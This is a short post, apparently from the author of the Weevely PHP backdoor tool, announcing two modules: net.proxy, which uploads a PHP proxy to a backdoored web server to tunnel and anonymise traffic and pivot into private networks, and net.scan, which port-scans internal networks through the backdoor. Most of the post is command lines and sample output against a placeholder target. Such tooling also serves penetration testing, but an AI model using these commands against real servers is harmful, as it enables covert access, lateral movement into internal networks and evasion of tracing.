I've added in Weevely suggestive modules to interact with remote networks.

net.proxy

Proxy module run a local HTTP proxy that tunnels your traffic through target web server. It locally spawn proxy at port 8080, by default. Setting http://localhost:8080 as proxy at your favourite browser you anonymize your traffic and eventually pivot toward private networks accessible from web server.

1
2
3
4
5
6
7
8

user@local$ ./weevely.py http://www.target.com/weev.php password :net.proxy

Weevely 0.6 - Generate and manage stealth PHP backdoors
              Emilio Pinna 2011-2012

[net.proxy] PHP proxy uploaded as 'http://www.target.com/weepro.php'
[net.proxy] Next times skip install running ':net.proxy rurl=http://www.target.com/weepro.php'
[net.proxy] Proxy running. Set 'http://127.0.0.1:8080' as HTTP proxy

Use :show net.proxy to show all configurable options.

net.scan

Scan module perform simple port scan through remote web server. Host entry supports different formats: as single host (es. www.google.it), as single IP (es. 138.128.2.48), as IP range (es. 138.128.2.0-138.128.2.255) as network (es. 138.128.2.48/24), as interface (es. eth3). Ports support single port (es. 80) or multiple ones (es 0-1024).

This function is really useful to perform scan toward internal network and eventually connect to them using net.proxy as pivot.

Usage example:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

user@local$ ./weevely.py http://www.target.com/weev.php password :net.scan eth9 80

Weevely 0.6 - Generate and manage stealth PHP backdoors
              Emilio Pinna 2011-2012

[net.scan] Scanning 1 ports of 256 hosts using 26 requests (10 connections per request)
..........
OPEN: 139.128.3.9:80
..........
..........
..........
..........
..........
..........
OPEN: 139.128.3.77:80
..........

Use :show net.scan to show all configurable options. To get informations about remote network interfaces and relative network addresses, use new module :net.ifaces.

This modules are available in Weevely git repository and in 0.7 version.